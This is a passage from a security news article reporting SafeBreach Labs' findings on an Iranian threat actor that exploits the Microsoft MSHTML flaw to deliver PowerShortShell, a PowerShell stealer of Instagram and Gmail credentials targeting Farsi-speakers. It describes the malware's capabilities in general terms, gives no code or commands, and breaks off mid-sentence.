The attacks started in July 2021 in which threat actors exploited Microsoft MSHTML vulnerability to target overseas Iranians.
SafeBreach Labs researchers discovered a new Iranian threat actor trying to steal Instagram and Google (Gmail) login credentials of Farsi-speakers globally. The threat actor is using a new PowerShell-based stealer dubbed PowerShortShell by SafeBreach Labs.
The attacks were initially reported in September by the Shadow Chase Group in a Twitter post. According to the group, a critical flaw in the Microsoft MSHTML platform was being exploited to launch different types of cyberattacks.
What is PowerShortShell?
PowerShortShell is an information stealer, but it can also collect system information from infected devices (which is transmitted to the attacker along with the stolen credentials beforehand) and perform Telegram surveillance.
Reportedly, the stealer is named so because it is a PowerShell script that’s short but has powerful “collection capabilities,” researchers noted. It provides the attacker with plenty of sensitive information within just 150 lines, including screen capture, document collection, Telegram files, and extensive details about the victims’ surroundings.
About the Phishing Campaign
According to SafeBreach Labs’ researcher Tomer Bar, the attacks started in